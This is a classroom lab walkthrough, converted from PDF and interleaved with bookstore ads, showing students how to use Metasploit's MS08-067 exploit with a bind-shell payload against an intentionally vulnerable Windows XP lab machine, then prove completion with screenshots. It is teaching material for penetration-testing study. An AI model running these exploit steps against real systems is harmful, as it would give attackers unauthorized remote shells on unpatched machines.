Password: abc123
converted by [Link]
11. Minimize the Metasploit Courtesy Shell (See Below)
Click the minimize button.
12. Login user your newly created username (hacker33) and password (abc123)
Note: At the very bottom of the screen you will see minimized command shell
prompt.
converted by [Link]
13. Select OK (See Below)
converted by [Link]
15. Close the VNCShell Windows, by click on the Red X, then clicking Close.
converted by [Link]
Proof of Lab
1. Cut and Paste a screen shot that looks similar to Step #3 in Section 9 into a
word document and upload to Moodle.
converted by [Link]
ComputerSecurityStudent (CSS)
HOME UNIX WINDOWS SECURITY TOOLS LECTURES FORENSICS SHOPPING CONTACT_US
Privacy Information
Metasploit
David Kennedy, Jim...
Best Price $26.80
or Buy New $27.87
Privacy Information
2. startx
Issue the startx command if you are currently are only seeing a console and
not a graphical user interface.
BackTrack 4
Shakeel Ali, Tedi ...
Best Price $40.00
2. Confirm Backtrack01 has an IP Address or Buy New $47.48
Professional Penetration
Testing
Thomas Wilhelm
Best Price $19.85
or Buy New $66.85
Privacy Information
converted by [Link]
Best Price $21.00
or Buy New
Privacy Information
Privacy Information
Privacy Information
Pro OpenSSH
Michael Stahnke
Best Price $11.57
or Buy New $26.77
Privacy Information
5. cd /etc/init.d/
Implementing SSH
Himanshu Dwivedi
Best Price $0.01
or Buy New $35.00
6. ./networking start
converted by [Link]
Privacy Information
Privacy Information
A Practical Guide to
Linux Commands,...
7. Confirm you have a valid IP address for eth0 Mark G. Sobell
In my case, eth0's IP address is [Link]. Best Price $16.74
or Buy New
Privacy Information
Privacy Information
converted by [Link]
Best Price $11.78
or Buy New $19.99
Privacy Information
Privacy Information
Practical Guide to
Fedora and Red Ha...
Mark G. Sobell
Best Price $2.11
or Buy New
Privacy Information
Privacy Information
Buy New
Privacy Information
converted by [Link]
converted by [Link]
ComputerSecurityStudent (CSS)
HOME UNIX WINDOWS SECURITY TOOLS LECTURES FORENSICS SHOPPING CONTACT_US
(Metasploit: MS08-067)
{ BackTrack5R1: Establishing A Shell To The Vulnerable Machine }
Metasploit Toolkit for
Penetration T...
0. Background Information David Maynor, Thom...
Best Price $10.80
1. [Link] or Buy New $43.05
The vulnerability could allow remote code execution if an affected system
received a specially crafted RPC request. On Microsoft Windows 2000, Windows Privacy Information
XP, and Windows Server 2003 systems, an attacker could exploit this
vulnerability without authentication to run arbitrary code. It is possible
that this vulnerability could be used in the crafting of a wormable exploit.
Firewall best practices and standard default firewall configurations can
help protect network resources from attacks that originate outside the
enterprise perimeter.
Metasploit
David Kennedy, Jim...
1. Log into Vulnerable Windows Machine Best Price $26.80
or Buy New $27.87
1. Start Up WindowsVulerable01.
Instructions:
Privacy Information
1. Start Up your VMware Player
2. Play virtual machine
Note:
For those of you not part of my class, this is a Windows XP machine
running SP2.
BackTrack 4
Shakeel Ali, Tedi ...
Best Price $40.00
or Buy New $47.48
Privacy Information
Professional Penetration
Testing
Thomas Wilhelm
Best Price $19.80
or Buy New $66.85
Privacy Information
Penetration Tester's
Open Source Too...
2. Logging into WindowsVulerable01. Jeremy Faircloth, ...
Instructions: Best Price $21.00
converted by [Link]
1. Username: administrator or Buy New
2. Password: Use the Class Password or whatever you set it.
Privacy Information
Privacy Information
Privacy Information
Privacy Information
Pro OpenSSH
Michael Stahnke
Best Price $11.57
or Buy New $26.77
Privacy Information
converted by [Link]
Privacy Information
Privacy Information
A Practical Guide to
Linux Commands,...
Mark G. Sobell
Best Price $16.74
or Buy New
Privacy Information
Privacy Information
Linux Administration
Wale Soyinka
Best Price $11.78
or Buy New $19.99
Privacy Information
converted by [Link]
Privacy Information
Practical Guide to
Fedora and Red Ha...
Mark G. Sobell
Best Price $2.11
or Buy New
Privacy Information
Privacy Information
3. Bring up the GNOME
Instructions:
1. Type startx
Buy New
Privacy Information
Sun
Paul Sanghera
Best Price $1.97
or Buy New $35.41
Privacy Information
4. Start up a terminal window
Instructions:
1. Click on the Terminal Window
converted by [Link]
Solaris Operating
Environment Boot C...
David Rhodes, Domi...
Best Price $0.74
or Buy New
Privacy Information
AIX 5L Administration
Randal K. Michael
Best Price $15.20
or Buy New $36.22
Privacy Information
Privacy Information
HP-UX
Asghar Ghori
Best Price $46.51
or Buy New $50.52
Privacy Information
converted by [Link]
Note:
Metasploit takes about 5 to 20 seconds to start up.
Buy New
Privacy Information
2. msfconsole screen
Note:
This is the msfconsole
converted by [Link]
4. Use exploit MS08-067 Exploit
Instructions:
1. use exploit/windows/smb/ms08_067_netapi
5. Show Payloads
Instructions:
1. show payloads
converted by [Link]
6. Set Payloads
Instructions:
1. set PAYLOAD windows/shell_bind_tcp
Note:
This Payload creates Windows Command Shell and Bind TCP Inline
7. Show Options
Instructions:
1. show options
Note:
Notice the Required Column. RPORT and SMBPIPE are already populated,
but RHOST is not.
In the next step, you will populate RHOST with the IP Address of
WindowsVulnerable01.
converted by [Link]
8. Set RHOST and Verify Show Options
Note:
Replace [Link] with your WindowsVulnerable01's IP Address
obtained in (Section 1, Step 4).
Instructions:
1. set RHOST [Link]
2. show options
converted by [Link]
10. Issue the systeminfo command
Instructions:
1. systeminfo
Note:
This is the system information report for Windows.
converted by [Link]
12. Proof of Lab
Instructions:
1. date
Press enter twice.
2. echo "Your Name"
This should be your actual name.
e.g., echo "John Gray"
Proof of Lab Instructions:
1. Do a PrtScn
2. Paste into a word document
3. Upload to Moodle.
converted by [Link]
This will reboot the victim windows machine.
Go ahead and check out what popped up on your victim windows machine.
Continue to the next step.
Proof of Lab
1. Cut and Paste a screen shot that looks similar to Step #12 in Section 3 into a
word document and upload to Moodle.
converted by [Link]